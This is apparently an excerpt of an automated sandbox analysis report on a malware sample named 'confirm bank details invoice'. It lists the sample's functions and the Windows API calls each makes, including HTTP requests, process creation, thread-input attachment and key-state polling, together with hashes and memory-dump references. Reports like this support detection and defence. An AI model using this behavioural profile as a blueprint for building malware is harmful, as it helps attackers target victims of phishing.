                    • Instruction Fuzzy Hash: 9DC12375608300AFC740DF65C885A6BB7E9FF88308F00495EF98A9B251DB74ED05CB96
                    Function 004B4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004B4047
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B405B
                    • GetWindowThreadProcessId.USER32(00000000), ref: 004B4062
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4071
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004B4083
                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B409C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B40AE
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B40F3
                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4108
                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4113
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 56788841447045125e984d82b31114eceabdaf3ac5c121d7087d4c7e048e9f3a
                    • Instruction ID: 3eb72eec730ec369cebb942fda9a38b8cd0e45caae53ef15692886d11f868da0
                    • Opcode Fuzzy Hash: 56788841447045125e984d82b31114eceabdaf3ac5c121d7087d4c7e048e9f3a
                    • Instruction Fuzzy Hash: DE318171900208ABEB10DB58DC49BBA77AAEFA4311F108016F904D7391CBB89D94CB78
                    Function 004EDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 0048B496
                    • SetTextColor.GDI32(?,000000FF), ref: 0048B4A0
                    • SetBkMode.GDI32(?,00000001), ref: 0048B4B5
                    • GetStockObject.GDI32(00000005), ref: 0048B4BD
                    • GetClientRect.USER32(?), ref: 004EDD63
                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 004EDD7A
                    • GetWindowDC.USER32(?), ref: 004EDD86
                    • GetPixel.GDI32(00000000,?,?), ref: 004EDD95
                    • ReleaseDC.USER32(?,00000000), ref: 004EDDA7
                    • GetSysColor.USER32(00000005), ref: 004EDDC5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                    • String ID:
                    • API String ID: 3430376129-0
                    • Opcode ID: ac56207c3e686ef11a2325903b3d87e2986305a8cdf432541a8dda3962b04945
                    • Instruction ID: d1ead2bff98ede219cb395d07fad254a82b730d98656453b7a62fa73d34efa68
                    • Opcode Fuzzy Hash: ac56207c3e686ef11a2325903b3d87e2986305a8cdf432541a8dda3962b04945
                    • Instruction Fuzzy Hash: 30117F31900205BFDB116F64EC09BBE3B66EB05721F104632FA66951E2CB310961EB29
                    Function 00473093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004730DC
                    • CoUninitialize.OLE32(?,00000000), ref: 00473181
                    • UnregisterHotKey.USER32(?), ref: 004732A9
                    • DestroyWindow.USER32(?), ref: 004E5079
                    • FreeLibrary.KERNEL32(?), ref: 004E50F8
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E5125
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 76b7fb3fcefa3fc26b6ee5c0fb0a84ef1ceeb88830b04fe4052fbcaa2eafadf8
                    • Instruction ID: 28408262a5c7e7eb8012df088e55663596791854cef6b657a9d6e5ccda06fcfd
                    • Opcode Fuzzy Hash: 76b7fb3fcefa3fc26b6ee5c0fb0a84ef1ceeb88830b04fe4052fbcaa2eafadf8
                    • Instruction Fuzzy Hash: 8C914F306001428FC719EF15C995AA9F3B4FF0530AF5481AEF50A67262DF38AE56DF58
                    Function 0048CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 0048CC15
                      • Part of subcall function 0048CCCD: GetClientRect.USER32(?,?), ref: 0048CCF6
                      • Part of subcall function 0048CCCD: GetWindowRect.USER32(?,?), ref: 0048CD37
                      • Part of subcall function 0048CCCD: ScreenToClient.USER32(?,?), ref: 0048CD5F
                    • GetDC.USER32 ref: 004ED137
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004ED14A
                    • SelectObject.GDI32(00000000,00000000), ref: 004ED158
                    • SelectObject.GDI32(00000000,00000000), ref: 004ED16D
                    • ReleaseDC.USER32(?,00000000), ref: 004ED175
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004ED200
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 2f71928379b9a09ba6500750e14ea478311f805389bd9b32a45b9afb49c28a09
                    • Instruction ID: 9edcd9920543e034943485df8e240e9c3210293233f9fae5483d7ac0fc937cf1
                    • Opcode Fuzzy Hash: 2f71928379b9a09ba6500750e14ea478311f805389bd9b32a45b9afb49c28a09
                    • Instruction Fuzzy Hash: 89711130800244DFCF21AF65C881ABE7BB1FF48316F18466BED555A3A6C7398842DF69
                    Function 004DECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                      • Part of subcall function 0048B63C: GetCursorPos.USER32(000000FF), ref: 0048B64F
                      • Part of subcall function 0048B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000001), ref: 0048B691
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 004DED3C
                    • ImageList_EndDrag.COMCTL32 ref: 004DED42
                    • ReleaseCapture.USER32 ref: 004DED48
                    • SetWindowTextW.USER32(?,00000000), ref: 004DEDF0
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004DEE03
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 004DEEDC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: 8fd13e67065a4d65a4c9ca05e68dc38c5b6f4c20f2be58b5db85f39fcf31e5c3
                    • Instruction ID: f551a6143d5af259d33d563dd6bb1cb333027b338c7772b6634d536a53102b8f
                    • Opcode Fuzzy Hash: 8fd13e67065a4d65a4c9ca05e68dc38c5b6f4c20f2be58b5db85f39fcf31e5c3
                    • Instruction Fuzzy Hash: 82519B70204300AFD710EF65DC96FAE77E5FB88708F00492EF5959A2E2DB749918CB5A
                    Function 004C45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004C45FF
                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004C462B
                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004C466D
                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004C4682
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C468F
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004C46BF
                    • InternetCloseHandle.WININET(00000000), ref: 004C4706
                      • Part of subcall function 004C5052: GetLastError.KERNEL32(?,?,004C43CC,00000000,00000000,00000001), ref: 004C5067
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                    • String ID:
                    • API String ID: 1241431887-3916222277
                    • Opcode ID: 19dd582c07fa51463179bb92aedf5d6689681a08ddc6118744f51145a1d4b731
                    • Instruction ID: 25d40b352a6cebc979019575e62d3e3a070f5c80c199d3c30a5172ff1b5eb693
                    • Opcode Fuzzy Hash: 19dd582c07fa51463179bb92aedf5d6689681a08ddc6118744f51145a1d4b731
                    • Instruction Fuzzy Hash: 7F418EB5A01205BFEB019F50CD95FBB77ACEF49314F00402AFA019A245D7B899448BA8
                    Function 004CB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0050DC00), ref: 004CB715
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0050DC00), ref: 004CB749
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004CB8C1
                    • SysFreeString.OLEAUT32(?), ref: 004CB8EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: d5c9e297ea2fe62adf7adf895627cc3adbf8103cc5f9bf13dda04a7f1709b22b
                    • Instruction ID: 03855488237563454892b09398c291a1cf44c42b49d7d44d5759cc6a435cf0a7
                    • Opcode Fuzzy Hash: d5c9e297ea2fe62adf7adf895627cc3adbf8103cc5f9bf13dda04a7f1709b22b
                    • Instruction Fuzzy Hash: 8AF13975A00209AFCF44DF94C885EAEB7B9FF48315F10845EF945AB250DB35AE42CBA4
                    Function 004D24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004D24F5
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004D2688
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004D26AC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004D26EC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004D270E
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004D286F
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004D28A1
                    • CloseHandle.KERNEL32(?), ref: 004D28D0
                    • CloseHandle.KERNEL32(?), ref: 004D2947
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: e77599fceb11fb11226ea729ed6b599ace845ac9d4eefd431091c0cee0f6fd5a
                    • Instruction ID: 125f38564b6b7304c4e0f1f62922e8f0a4d3892317d5534e0e4bc23d85cbd48d
                    • Opcode Fuzzy Hash: e77599fceb11fb11226ea729ed6b599ace845ac9d4eefd431091c0cee0f6fd5a
                    • Instruction Fuzzy Hash: F7D1C131604200DFCB14EF25C5A1A6EBBE1AF94314F14896FF8895B3A2DB79DC01CB5A
                    Function 004DB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004DB3F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: f28b402698c744363654dc833df0c735ee492bd0d8b5abdc3bbe36d0f3403d3c
                    • Instruction ID: 92819deb1aaf07b698e48556bd630ca830298dae7b8a6139d5bdf6b3a10c573b
                    • Opcode Fuzzy Hash: f28b402698c744363654dc833df0c735ee492bd0d8b5abdc3bbe36d0f3403d3c
                    • Instruction Fuzzy Hash: 7B51A330500204FBEF209F298CA9BAE3BA5EB05318F654117FA15D63E1CB79E950DBD9
                    Function 0048A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004EDB1B
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004EDB3C
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004EDB51
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004EDB6E
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004EDB95
                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0048A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 004EDBA0
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004EDBBD
                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0048A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 004EDBC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                    • String ID:
                    • API String ID: 1268354404-0
                    • Opcode ID: a68a6e9ce74516c1d32d4c80605fff5873eda68241669d6865366aae8c19a21e
                    • Instruction ID: c4e4e391e5275b675f64de60d6e23d2b8c53a9748007ef70e98754618ba9bca4
                    • Opcode Fuzzy Hash: a68a6e9ce74516c1d32d4c80605fff5873eda68241669d6865366aae8c19a21e
                    • Instruction Fuzzy Hash: 38517F30A00209EFEB20DF69CC81FAE37B5EB58354F10052AF94697290E7B8ED50DB59
                    Function 004B7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004B5FA6,?), ref: 004B6EF1
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • lstrcmpiW.KERNEL32(?,?), ref: 004B75CA
                    • _wcscmp.LIBCMT ref: 004B75E2
                    • MoveFileW.KERNEL32(?,?), ref: 004B75FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: 067ec70edcd8ac17be9dd484f81cdeab0fe5dfdda7dcfe2bb9e133a60797f6f3
                    • Instruction ID: f5b7b35d1fde042b9053e49b81c5deee5ea0f352facd9a16a6b6f41840dcd27e
                    • Opcode Fuzzy Hash: 067ec70edcd8ac17be9dd484f81cdeab0fe5dfdda7dcfe2bb9e133a60797f6f3
                    • Instruction Fuzzy Hash: 495151B2A092195EDF54EB95D8819DE73BC9F48324F0040AFF605E3541EA78D6C5CB78
                    Function 0048EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 0048EAEB
                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 0048EB32
                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 004EDC86
                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 004EDCF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 76238f95f331044d3fd909e92916dd6bd97e0e8f3ed8f208dfa8a3edc8b82a7c
                    • Instruction ID: 398021f4d24475ecbb988f034d674a270e1f08850726c10a5919e28a250cabbf
                    • Opcode Fuzzy Hash: 76238f95f331044d3fd909e92916dd6bd97e0e8f3ed8f208dfa8a3edc8b82a7c
                    • Instruction Fuzzy Hash: 9E41E970A046809AD739F72B8D8DA3F7AD6AB51305F290C1FE04786761C67CB841D71E
                    Function 004AB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB26C
                    • HeapAlloc.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB273
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004AAEF1,00000B00,?,?), ref: 004AB288
                    • GetCurrentProcess.KERNEL32(?,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB290
                    • DuplicateHandle.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB293
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004AAEF1,00000B00,?,?), ref: 004AB2A3
                    • GetCurrentProcess.KERNEL32(004AAEF1,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB2AB
                    • DuplicateHandle.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB2AE
                    • CreateThread.KERNEL32(00000000,00000000,004AB2D4,00000000,00000000,00000000), ref: 004AB2C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 72844e1a769d50fe0fd44fee16e1e98cc36e4c2db5b14b1a77e96133dcac3bb2
                    • Instruction ID: 854bd71fe61277dc9a6b390c8c87dddb960aa8051868dbfc31ee4672ed744db3
                    • Opcode Fuzzy Hash: 72844e1a769d50fe0fd44fee16e1e98cc36e4c2db5b14b1a77e96133dcac3bb2
                    • Instruction Fuzzy Hash: A601F6B2640308BFE710ABA5DD4DF6B3BADEB89700F018421FA04CB1A1CA749C10CB65
                    Function 004CC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 1838f6d77efa0d2eb3cf8f16d704cf5a763dd641b68479b79bbd60a168e933ab
                    • Instruction ID: e9f1c15c49f26b0e9a5cb7ac70b8fd597ab53d383048f8bfe54f9f43173b3909
                    • Opcode Fuzzy Hash: 1838f6d77efa0d2eb3cf8f16d704cf5a763dd641b68479b79bbd60a168e933ab
                    • Instruction Fuzzy Hash: DFE1A475A00219ABDF54DFA4C981FAF77B5EF48354F14802EE909A7380D7789D41CBA8
